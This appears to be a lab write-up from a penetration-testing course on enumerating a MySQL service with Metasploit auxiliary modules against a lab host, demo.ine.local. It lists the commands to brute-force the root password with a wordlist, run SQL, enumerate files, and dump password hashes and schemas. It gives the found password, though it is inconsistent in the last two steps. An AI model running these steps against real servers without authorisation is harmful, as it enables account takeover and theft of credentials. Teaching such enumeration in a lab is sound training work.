MySQL Enumeration

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a MySQL service will be accessible at demo.ine.local.

Objective: Your task is to run the following auxiliary modules against the target:

auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login
auxiliary/admin/mysql/mysql_enum
auxiliary/admin/mysql/mysql_sql
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_hashdump
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_writable_dirs

Tools

The best tools for this lab are:

Nmap
Metasploit Framework

Writeup

auxiliary/scanner/mysql/mysql_version

use auxiliary/scanner/mysql/mysql_version
set RHOSTS demo.ine.local
run

auxiliary/scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login
set RHOSTS demo.ine.local
set USERNAME root
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set STOP_ON_SUCCESS true
run

auxiliary/admin/mysql/mysql_enum

use auxiliary/admin/mysql/mysql_enum
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD twinkle
run

auxiliary/admin/mysql/mysql_sql

use auxiliary/admin/mysql/mysql_sql
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD twinkle
set SQL "SHOW DATABASES;"
run

auxiliary/scanner/mysql/mysql_file_enum

use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD twinkle
set FILE_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
set VERBOSE true
run

auxiliary/scanner/mysql/mysql_hashdump

use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD twinkle
run

auxiliary/scanner/mysql/mysql_schemadump

use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD password
run

auxiliary/scanner/mysql/mysql_writable_dirs

use auxiliary/scanner/mysql/mysql_writable_dirs
set RHOSTS demo.ine.local
set USERNAME root
set PASSWORD password
set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
run

PreviousApache Enumeration NextSSH Login

Last updated 7 months ago

hashtagLab Environment

hashtagTools

hashtagWriteup

hashtagauxiliary/scanner/mysql/mysql_version

hashtagauxiliary/scanner/mysql/mysql_login

hashtagauxiliary/admin/mysql/mysql_enum

hashtagauxiliary/admin/mysql/mysql_sql

hashtagauxiliary/scanner/mysql/mysql_file_enum

hashtagauxiliary/scanner/mysql/mysql_hashdump

hashtagauxiliary/scanner/mysql/mysql_schemadump

hashtagauxiliary/scanner/mysql/mysql_writable_dirs